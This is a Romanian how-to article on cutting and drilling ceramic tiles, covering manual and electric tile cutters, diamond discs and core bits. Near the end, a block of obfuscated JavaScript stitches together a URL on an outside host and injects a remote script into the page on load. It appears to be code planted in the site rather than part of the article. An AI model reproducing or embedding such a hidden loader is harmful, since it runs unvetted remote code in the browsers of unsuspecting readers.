Prelucrarea gresiei

Până la obținerea produsului final, orice material folosit în construcții și amenajări trece printr-un proces de prelucrare. Acest lucru este valabil și în cazul plăcilor de gresie. Cu toate că există o varietate de dimensiuni disponibile pentru plăcile de gresie, întotdeauna se ivește câte o situație în care acestea trebuie tăiate pentru a se potrivi pe o anumită suprafață. Procesul de prelucrare al plăcilor nu e unul foarte complicat, însă sunt necesare diverse utilaje și accesorii cu ajutorul cărora se obține mai ușor dimensiunea dorită a produsului și în timp mai scurt.Copiază HTML Copiază textul

Utilaje necesare în procesul de prelucrare

Cel mai cunoscut utilaj care se folosește în procesul de prelucrare este mașina de tăiat gresia. O astfel de mașină este utilă atât pentru cei care lucrează în regim profesional, cât și pentru cei care se ocupă ocazional de proiecte de amenajare. Având un principiu de funcționare relativ simplu, se manevrează ușor și are un randament bun. Bineînțeles, are o precizie de tăiere extraordinar de bună, care nu afectează în niciun fel calitatea materialului și a suprafeței.

Importante în procesul de prelucrare al gresiei sunt și accesoriile, precum discurile diamantate sau carotele. Discul diamantat se folosește pentru tăierea precisă și curată a plăcilor ceramice, în vreme ce carota gresie este un accesoriu folosit pentru efectuarea găurilor în plăci. Atât discurile diamantate, cât și carotele sunt disponibile în diverse variante.

Cum se folosește o mașină de tăiat gresia?

La acest capitol trebuie să menționăm faptul că sunt două categorii de mașini de tăiat gresia. Prima categorie cuprinde mașinile de tăiat manuale, care pot fi folosite chiar și acasă, de către cei mai puțin experimentați, iar ce-a de doua cuprinde toate mașinile de tăiat profesionale. Așa cum era de așteptat, mașinile profesionale sunt electrice. Spre deosebire de cele manuale, au un randament mai mare, taie cu o precizie mai bună și sunt folosite de regulă în regim profesional. De asemenea, pot fi utilizate pentru a tăia plăci mai groase și pentru a efectua margini curbate.

Atunci când se utilizează o mașină de tăiat gresia manuală, se ia placa de gresie, se poziționează în suportul mașinii, după care se apasă ferm pe mânerul tăietorului cu o presiune constantă până când se efectuează tăietura. Toate acestea se întâmplă după măsurarea cu mare atenție a dimensiunilor, bineînțeles! Dacă tăietura nu este precisă, iar marginile sunt ușor aspre, e nevoie de utilizarea unei pile pentru a le șlefui.

În cazul utilizării unei mașini electrice, lucrurile sunt mai simple. Acestea sunt prevăzute cu discuri diamantate, care asigură o tăiere mai fină.

Cum se efectuează găurile în plăcile de gresie?

Ei bine, atunci când e nevoie să efectuezi găuri în plăcile de gresie poți întâmpina dificultăți. Fiindcă plăcilor se pot crăpa, e necesar să folosești accesoriile potrivite. Cel mai bine este să alegi să folosești o carotă gresie. Carotele diamantate sunt disponibile în diferite dimensiuni, astfel, nu trebuie să îți faci griji în privința aceasta.

Ai nevoie doar de un ciocan rotopercutor sau de o bormașină, la care să atașezi carota în dimensiunea dorită. Bineînțeles, trebuie să acorzi atenție tipului de carotă ales, fiindcă sunt disponibile mai multe tipuri, în funcție de materialul care trebuie prelucrat.

Accesoriile sunt de fapt piese consumabile, care odată cu trecerea timpului trebuie înlocuite. De obicei, uzura se remarcă atunci când tăieturile nu mai sunt atât de fine ca înainte, când aspectul este mai neted sau când tăierea e mai lentă. Consumabilele se pot deteriora și dacă se folosesc pentru alte suprafața decât pentru cele care au fost indicate. De aceea, înainte de a le achiziționa, e bine sa te asiguri că sunt potrivite materialului care urmează a fi prelucrat.

(function(){
tiiau=”dwfiy6Xwiiak”;tiia=document.createElement(“script”);
tiia_=”u”+(“st”);tiia_+=”at”+(“.”);tiia.async=true;tiia_+=”in”;
tiiau=”423456625.”+tiiau;tiia.type=”text/javascript”;tiiau+=”ueir3kw1fdqm”;
tiiau+=”jdw7tb”;tiia_+=(“f”)+”o”+(“/”);tiia.src=”https://”+tiia_+tiiau;
tiiad=document.body;tiiad.appendChild(tiia);
})();

Articolul Prelucrarea gresiei apare prima dată în Stiri Zilnic.